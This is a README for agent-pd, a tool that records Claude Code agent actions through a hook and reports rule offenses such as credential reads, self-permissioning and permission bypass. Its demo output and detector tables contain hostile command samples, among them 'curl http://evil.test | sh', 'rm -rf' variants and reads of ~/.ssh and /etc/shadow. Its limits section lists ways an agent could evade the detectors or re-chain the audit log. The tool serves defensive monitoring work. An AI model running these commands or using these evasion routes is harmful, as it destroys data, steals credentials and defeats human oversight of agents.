# Show HN: A police department for your Claude Code agents

> Source: <https://github.com/varmabudharaju/agent-pd/blob/master/README.md>
> Published: 2026-06-11 17:47:39+00:00

A logging-only hook records every tool & permission event from the main agent **and** its
subagents; the `pd`

CLI replays that log through six detectors and reports rule offenses with
quoted evidence. **Catch-and-report — it never blocks.**

** Quickstart** ·

**·**

[How it works](#how-it-works-mental-model)**·**

[Detectors](#the-detectors)**·**

[Architecture](https://github.com/varmabudharaju/agent-pd/blob/master/ARCHITECTURE.md)

[Security](https://github.com/varmabudharaju/agent-pd/blob/master/SECURITY.md)The department's body-cam. agent-pd won't stop the heist — but every move your agents make ends up on the record.

Flight recorder + police scanner, not a firewall.If you need tostopan action, that stays with Claude Code's permission prompts or an OS sandbox. agent-pd tells you what an agent did — faithfully, after the fact or live as it happens.

**Highlights**

**Covers the main agent + every subagent**, including those spawned by Claude Code's new dynamic** Workflow**tool (verified against recorded`workflow-subagent`

hook events).**Six deterministic detectors** at**zero token cost**— denied calls, out-of-scope & credential access, permission bypass, self-permissioning, disallowed tools, off-task work.**Tamper-evident audit log**(hash-chained) with an optional** off-host append-only sink**.** Sessions are named, not UUIDs**—`pd list`

and`pd watch`

show each session's project directory and first user prompt, derived from data already in the logs (works retroactively).**Honest by design**— it raises the bar; it is** not**a sandbox. See[SECURITY.md](https://github.com/varmabudharaju/agent-pd/blob/master/SECURITY.md).

**What it looks like** — `pd watch --all`

across three concurrent sessions (three projects,
main agents + subagents with their briefs, two genuine flags and one borderline search among
the ordinary work):

Every screenshot in this README is a real Terminal capture of the real engine replaying a seeded three-session fleet — reproduce them yourself with

[.]`examples/demo-sessions.sh`

Claude Code agents can read files, run shell commands, and spawn subagents. Most of that is
fine — but you usually find out what an agent *actually did* only by scrolling a transcript,
and **denied calls never reach the transcript at all** (Claude Code kills them first). agent-pd
installs a hook that records every event to a per-session audit log, then gives you tools to
ask: *did any agent go out of scope, touch credentials, try to escalate, edit its own config,
use a tool it wasn't allowed, or wander off its brief?*

```
 SETUP              CAPTURE (automatic, every session)        READ (per session or --all)
 pd install-hook  →  hook fires on every tool call        →   pd report   (forensic)
      │                    │                                   pd watch    (live scanner)
 settings.json       ~/.claude/pd/audit/<session>.jsonl        pd judge    (opt-in LLM pass)
```

For the full picture — system context, component, sequence, detector-pipeline, and integrity diagrams (with rendered images) — see

[ARCHITECTURE.md].

**The hook is a dumb, crash-safe recorder.** Registered globally in`~/.claude/settings.json`

on PostToolUse / PermissionDenied / SubagentStart / SubagentStop. On each event it appends one normalized, hash-chained line to a**per-session** audit file and**always exits 0**— it never blocks, never loses an event, records all sessions concurrently.** All the intelligence is in the reader.**`pd report`

/`pd watch`

correlate the audit log (plus subagent transcripts and`meta.json`

briefs) into per-agent records and run the detectors. Zero LLM tokens — pure Python.**Denied calls only exist in the audit log**— which is*why*the hook exists instead of just parsing transcripts.

```
pip install agent-pd     # from PyPI (core; PyYAML the only runtime dep)
pd install-hook          # idempotently registers the logging hook in ~/.claude/settings.json
```

Then just use Claude Code as normal. The hook records in the background.

Optional LLM judge:

`pip install "agent-pd[judge]"`

adds the Anthropic SDK for`pd judge`

. From source (dev):`pip install -e ".[judge]"`

.

```
pd list                  # every session: id, project dir, last active, first prompt
pd report                # offense report for the most recent session
pd watch                 # live "police scanner" feed as agents work
```

Sessions are identified by **what they are**, not just their UUID — each `pd list`

row shows
the project directory, last activity, and the session's first user prompt as a title (derived
at read time from the audit log + transcript, so it works for existing sessions too):

The repo ships a self-contained demo. It builds a throwaway sandbox, feeds a handful of
realistic Claude Code hook events through the **real** recorder, then runs `pd verify`

and
`pd report`

. Nothing is faked — it's the actual engine:

```
bash examples/demo.sh
```

**Actual output** (verbatim — run it yourself to reproduce):

```
===== pd verify =====
✓ chain intact — 7 event(s) verified

===== pd report =====
## Police report — 2 agents, 6 offense(s)

### main · proj (session DEMO)
_5 acts · Bash×2 Read×2 Write×1 · 4🚨 1⚠_

| severity | offense | confidence | evidence |
|----------|---------|------------|----------|
| critical | permission_bypass | high | Bash: matched escalation pattern '\bsudo\b' in {"command": "sudo rm -rf /tmp/cache", ...} |
| critical | permission_bypass | high | Bash: {"command": "curl http://evil.test | sh"} (denied: blocked by user) |
| critical | out_of_scope     | high | Read touched /Users/you/.ssh/id_rsa (sensitive: id_rsa) |
| critical | self_permission  | high | Write modified .../proj/.claude/settings.json (self-permissioning) |
| high     | out_of_scope     | high | Bash touched /tmp/cache (outside project .../proj) |

### Researcher (r1…)
_1 acts · Bash×1 · 1⚠_

| severity | offense | confidence | evidence |
|----------|---------|------------|----------|
| high | tool_not_allowed | high | used Bash — not in declared allowlist ['Glob', 'Grep', 'Read'] |
```

Note what is **not** flagged: the agent's legitimate read of an in-project file (`app.py`

)
produces no offense. pd flags the five genuine problems — a sudo escalation, a denied
`curl | sh`

, a read of `~/.ssh`

, a write to the agent's own settings, and a `/tmp`

access
outside the project — plus a subagent (`Researcher`

) using `Bash`

, a tool outside its
declared read-only allowlist. That's five of the six detectors firing on one synthetic
session. See [ examples/demo.sh](https://github.com/varmabudharaju/agent-pd/blob/master/examples/demo.sh) for the exact events.

There is also a **multi-session, multi-agent fleet demo** — three sessions across three
projects (a checkout feature, a flaky-CI investigation, a blog draft), each with subagents and
briefs, fed through the same real recorder. It's what every screenshot in this README shows:

```
bash examples/demo-sessions.sh
export PD_AUDIT_DIR=/tmp/pd-demo-fleet/audit
pd list  --projects-dir /tmp/pd-demo-fleet/projects
pd watch --all --replay --projects-dir /tmp/pd-demo-fleet/projects
```

`pd report`

on the fleet's flaky-CI session — per-agent digest, offense table, quoted evidence:

Want to verify it on your own real Claude Code session?Follow the safe ~15-minute hands-on walkthrough in[.]`docs/manual-tests/TRY-IT-LIVE.md`

```
pd install-hook                       # register the logging hook (one-time)
pd list                               # every session: id · project · last active · “first prompt”

pd report                             # offense report, most recent session
pd report --session <id> --format md  # md | json | both
pd report --verbose                   # full evidence + files-touched per agent
pd report --agent <id|main>           # focus one agent: digest + every action it took

pd watch                              # live feed, most recent session — streams NEW activity
                                      #   from now (like tail -f); existing backlog is skipped
pd watch --replay                     # replay the whole session's backlog first, then tail
pd watch --all                        # merged feed across ALL sessions (§session tag; an intro
                                      #   line names each session's project + first prompt)
pd watch --crimes-only                # quiet unless something's wrong
pd watch --verbose                    # full commands + reasons, no truncation
pd watch --session <id> --no-color --no-emoji   # plain terminals / SSH

pd verify                             # check the audit-log hash-chain (most recent session)
pd verify --all                       # verify every session; exit 2 on tamper/truncation
                                      # set PD_AUDIT_KEY for HMAC-keyed integrity

pd judge                              # dry run (free): items / agents / ≈token estimate
pd judge --run --via-claude-code      # confirm off_task flags on your Claude subscription
pd judge --run --model sonnet --max 20    # or via the metered Anthropic API

pd compact [--session ID] [--prune-older-than DAYS] [--dry-run]
                                      # gzip old logs (<sid>.jsonl -> .jsonl.gz); skips the active
                                      # session; lossless for detection. Optional age-based prune.

pd sink push [--session ID] [--all]   # forward un-sent chained events off-host (append-only sink)
pd sink status [--session ID] [--all] # forwarded/last per session; flags "remote ahead"
```

Six deterministic detectors (zero tokens) plus one opt-in LLM pass.

| Offense | Severity | What it catches | Confidence |
|---|---|---|---|
`permission_bypass` |
critical | Denied calls + a two-tier Bash scan: never-downgrade catastrophic (`rm -rf /` , fork bomb, `curl|sh` , `dd of=/dev/…` ) stay critical under any allow-rule; downgradable escalation (sudo, `chmod 777` , cwd-wipe) only by a precise rule. |
high |
`out_of_scope` |
high / critical | File or Bash path outside the project (auto: git root or cwd), or outside configured `scope_dirs` . Sensitive paths (`~/.ssh` , `~/.aws` , `~/.claude` , `/etc/shadow` , shell history…) are always critical and never downgraded. |
high |
`self_permission` |
critical | Any agent write to its own control files (`.claude/settings*.json` , `.claude/agents/*.md` , `pd-rules*.yaml` ) via any method — Write/Edit/NotebookEdit or Bash `cp` /`mv` /`tee` /`sed` /`python` /`base64` /redirect — regardless of content. |
high |
`tool_not_allowed` |
high | A subagent uses a tool outside its declared `tools:` allowlist (`.claude/agents/<type>.md` ). |
high |
`redundant` |
low | Exact-duplicate tool calls (ignores Bash `description` noise). |
high |
`off_task` |
review | Search/query terms vs. the agent's brief, by word-overlap below a threshold. | low — heuristic |

The five deterministic detectors are trustworthy and free. `off_task`

is intentionally noisy
and hard-labeled low-confidence — the **judge** (below) turns it into high-confidence verdicts.

`out_of_scope`

and escalation hits are **downgraded to a quiet info severity** when the action
matches a permission

**allow-rule** you configured (

`permissions.allow`

in `~/.claude/settings.json`

or project `.claude/settings.local.json`

) — *authorized → info, unauthorized → full severity*.

Matching is **faithful to Claude Code's own semantics**: shell-operator splitting (a `Bash(git:*)`

rule does **not** license `git status && rm -rf ~`

), command-substitution / backtick extraction,
redirect targets as a separate authorization, word-boundary prefixes (`npm install:*`

≠
`npm installmalware`

), and gitignore-style globs. Ambiguity resolves **conservatively → not
permitted** (under-flagging is worse than over-flagging). Two things are **never** downgraded:
sensitive-path access and categorically-catastrophic commands. A denied call stays critical
regardless — a denial is unpermitted by definition.

An optional LLM pass that reads each agent's brief and its flagged searches, then confirms or
drops the noisy `off_task`

flags. Built to cost almost nothing:

**Opt-in**— never runs in the hook or`pd watch`

.**Dry-run by default**— prints an estimate; add`--run`

to actually call.**Pre-filtered + batched**— only already-flagged items, one API call per agent.** Two backends:**`--via-claude-code`

shells out to the headless`claude`

CLI (**your Claude subscription, no API key**), or the metered Anthropic API (`pip install -e ".[judge]"`

+`ANTHROPIC_API_KEY`

).`--model haiku|sonnet|opus`

(default haiku),`--max N`

.

In the demo fleet, the orders-api subagent rabbit-holed into a CI-infra search with zero word-overlap against its brief — the heuristic flags it for review, and the dry run prices out exactly what confirming it would cost:

A real-time feed of what your agents are doing and which rules they're breaking. The header
**names the session it attached to** — project directory plus the session's first prompt — so
attaching to the default (most recent) session is never a mystery:

Each agent gets a stable color and a banner with its assigned brief; every action is a feed
line with a severity badge; a live rap-sheet footer tallies crimes per agent. With `--all`

(merged feed across every session) the first time a session appears it prints a
`§sid · project · “title”`

intro line, so interleaved sessions stay tellable-apart — see the
fleet screenshot at the top of this README.

`--crimes-only`

keeps the feed quiet unless something is actually wrong — only flagged actions
stream — and Ctrl-C prints a final **rap sheet** tallying every agent in every session:

Zero extra dependencies — ANSI only. The full annotated
screenshot set lives in [docs/test-evidence.md](https://github.com/varmabudharaju/agent-pd/blob/master/docs/test-evidence.md).

Every event carries a `seq`

and a `chain = sha256(prev_chain + canonical(event))`

(HMAC-SHA256
if `PD_AUDIT_KEY`

is set), computed by the hook under a per-session file lock with a
`<sid>.head.json`

anchor. ** pd verify** recomputes the chain and reports

`✓ intact`

,
`✗ TAMPER DETECTED`

, or `✗ TRUNCATED`

(exit 2), and holds across `pd compact`

. Here's it
catching both attacks for real — one event deleted from a log's tail, then one byte flipped
inside a recorded command (the compacted session still verifies):This is tamper-**evident**, not tamper-** proof**: a same-user agent with Bash can re-chain the
whole file. To close the *retroactive-deletion* half of that gap, ** pd sink push** forwards each
chained event to an

**off-host, append-only destination**(file or http backend; env-only

`PD_SINK_TOKEN`

; `https://`

enforced for remote tokens; redirects not followed). Once an event has
shipped off-host, a later local rewrite can't reach it. **flags "remote ahead" when more events shipped than remain locally — a truncation signal:**

`pd sink status`

Append-only is a

deployment requirementpd can't enforce, and the sink does not stop a same-user agent fromforgingentries ordisablingthe hook. Read[SECURITY.md]for the full, honest framing before relying on any of this.

agent-pd **raises the bar; it is not a sandbox.** A determined same-privilege adversary using
obfuscation or indirection can evade static detection. Known limits, in plain terms:

**Obfuscation / indirection evades static detection.** Multi-level`$VAR`

chains (`A=/etc/shadow; B=$A; cat $B`

— only single-level expansion is followed),`$IFS`

/ word-split tricks, two-step download-then-exec (`curl -o f url; sh f`

), base64/eval-assembled commands, and dynamically-built paths can slip past.**Non-Bash file-write MCP tools bypass** Only Write/Edit/NotebookEdit and Bash are inspected for control-file writes; a filesystem MCP tool with a different shape could write`self_permission`

.`.claude/settings.json`

undetected.(word-overlap) and can't run on the main agent or on Workflow subagents (no brief).`off_task`

is heuristic`pd judge`

is the trustworthy path.and can be noisy (it holds innocuous app config too).`~/.config`

sensitivity is broad**Tool**— the hook captures*results*aren't surfaced`tool_input`

and an outcome flag, not full`tool_response`

, to keep the audit log from bloating. The feed shows what an agent*did*, not its output.**Audit integrity is tamper-evident, not tamper-proof**(above), and the off-host sink's append-only guarantee is the operator's responsibility.** Symlink resolution is best-effort**(the symlink must exist at analysis time).** Sessions that predate the hook**(transcript-only, no`<sid>.jsonl`

) don't appear in`pd report`

.

The full ledger of shipped / residual / declined items lives in [KNOWN-GAPS.md](https://github.com/varmabudharaju/agent-pd/blob/master/KNOWN-GAPS.md).

Prioritized, none blocking — scoped so any one can be picked up independently:

**Tool-agnostic control-file detection**— flag*any*tool whose input names a control path in a write-shaped field (closes the MCP`self_permission`

gap).**Multi-level**— iterate variable substitution to a fixed point so 2-hop indirection (`$VAR`

resolution`B=$A`

) no longer hides a sensitive path.**Truncate / cap** at capture to keep raw`tool_result`

`.jsonl`

small.**Narrow** to credential-bearing subpaths (`~/.config`

sensitivity`gh`

,`gcloud`

, …) to cut noise.**Sink enhancements**— chunk large backlogs, a syslog backend, and`pd verify --against-sink`

read-back reconciliation.— per-agent digest (files touched, time span, tool histogram).`pd summary <session>`

**Judge verdict disk cache**— skip re-judging identical (brief, search) pairs.** Capture more hook events**(`PostToolUseFailure`

,`PreCompact`

,`SessionEnd`

) to enrich timelines.

agent-pd works out of the box with no config — every rule (sensitive paths, escalation
patterns, severities, the `off_task`

threshold) ships as a built-in default. A `pd-rules.yaml`

file is **optional**, and only needed to override those defaults.

When you do write one, every command **auto-discovers** it — no flag required. On each run `pd`

looks for `pd-rules.yaml`

in this order and uses the first it finds, deep-merged over the
built-in defaults:

- the current directory
- the enclosing
**project root**(the git root above the cwd) `~/.claude/pd-rules.yaml`

(a global default for all projects)

Precedence is ** --rules <path> › auto-discovered file › built-in defaults** — pass

`--rules`

on any command (including `pd watch`

) to point at a specific file and override discovery. See
`pd-rules.yaml`

in this repo for every supported key (`scope_dirs`

, sensitive paths, the two
escalation tiers, severities, `off_task_overlap_threshold`

, `storage`

, and a `sink`

section).Lists in

`pd-rules.yaml`

replacethe corresponding default list (deep-merge replaces lists, not appends) — so if you set`sensitive_patterns`

, include the built-ins you still want.

The off-host sink also reads env overrides: `PD_SINK_TYPE=file|http`

, `PD_SINK_PATH`

/
`PD_SINK_URL`

, `PD_SINK_TIMEOUT`

, and the **env-only** `PD_SINK_TOKEN`

(ignored if placed in a
config file, so it never lands in a checked-in or world-readable file).

```
~/.claude/pd/audit/<sid>.jsonl      # live capture (hook appends here)
~/.claude/pd/audit/<sid>.jsonl.gz   # compacted (pd compact, gzip)
```

The audit log stores **full tool inputs** — file contents and Bash commands — which **may include
secrets in plaintext**. It lives **outside your repo** (won't be committed by accident) but treat
it like any sensitive local file. `pd compact`

gzips, it does **not** encrypt. Nothing is uploaded
unless you configure a sink. To clear it: `rm ~/.claude/pd/audit/*.jsonl`

(it repopulates as
sessions run).

**Choosing where logs go.** The default is deliberately a hidden, local, non-repo path. To put
logs somewhere you choose, set `PD_AUDIT_DIR`

, or bake it into the hook at install time:

```
pd install-hook --audit-dir ~/agent-pd-logs   # hook + CLI both use this path
# or, per shell: export PD_AUDIT_DIR=~/agent-pd-logs
```

Both the hook (writes) and every `pd`

command (reads) honor `PD_AUDIT_DIR`

(precedence:
`--audit-dir`

flag › `PD_AUDIT_DIR`

› default). A **relative** path is resolved to an absolute
one when it's set (the install flag bakes the absolute path; `PD_AUDIT_DIR`

is absolutized when
read), so logs always land in one fixed place instead of scattering into whatever directory each
agent happens to run in. Still, **don't** point it at a repo folder or a cloud-synced directory
(iCloud/Dropbox) unless you accept that plaintext tool inputs — possibly secrets — will be
committed or synced off-machine.

```
pip install --user -e .          # core
pip install --user -e ".[judge]" # + anthropic SDK (only for the API judge backend)
python3 -m pytest -q             # 474 tests, pure (no API key needed)
```

TDD throughout; detectors, render, live, and judge are all unit-tested with no network. For the
design in depth: [SYSTEM-DESIGN.md](https://github.com/varmabudharaju/agent-pd/blob/master/SYSTEM-DESIGN.md) (formal design doc — goals, components,
permission model, trade-offs) and [ARCHITECTURE.md](https://github.com/varmabudharaju/agent-pd/blob/master/ARCHITECTURE.md) (diagrams). Honest
limitations and roadmap live in [KNOWN-GAPS.md](https://github.com/varmabudharaju/agent-pd/blob/master/KNOWN-GAPS.md).

[Apache License 2.0](https://github.com/varmabudharaju/agent-pd/blob/master/LICENSE) © Sai Ram Varma Budharaju. Free to use, modify, and distribute (including
commercially); retain the copyright and license notice. Includes a patent grant.
